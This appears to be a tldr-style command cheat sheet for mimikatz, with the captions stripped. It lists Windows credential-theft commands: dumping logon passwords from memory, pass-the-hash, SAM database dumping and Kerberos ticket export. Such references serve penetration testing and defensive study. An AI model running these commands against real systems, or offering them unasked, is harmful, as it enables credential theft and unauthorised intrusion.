mimikatz
Interact with Windows credentials, perform credential dumping, token manipulation, and more. Requires administrator privileges and typically runs on Windows. More information: https://github.com/gentilkiwi/mimikatz.
mimikatz
mimikatz "privilege::debug"
mimikatz "sekurlsa::logonpasswords"
mimikatz "sekurlsa::logonpasswords"
mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"
mimikatz "lsadump::sam"
mimikatz "kerberos::list /export"
exit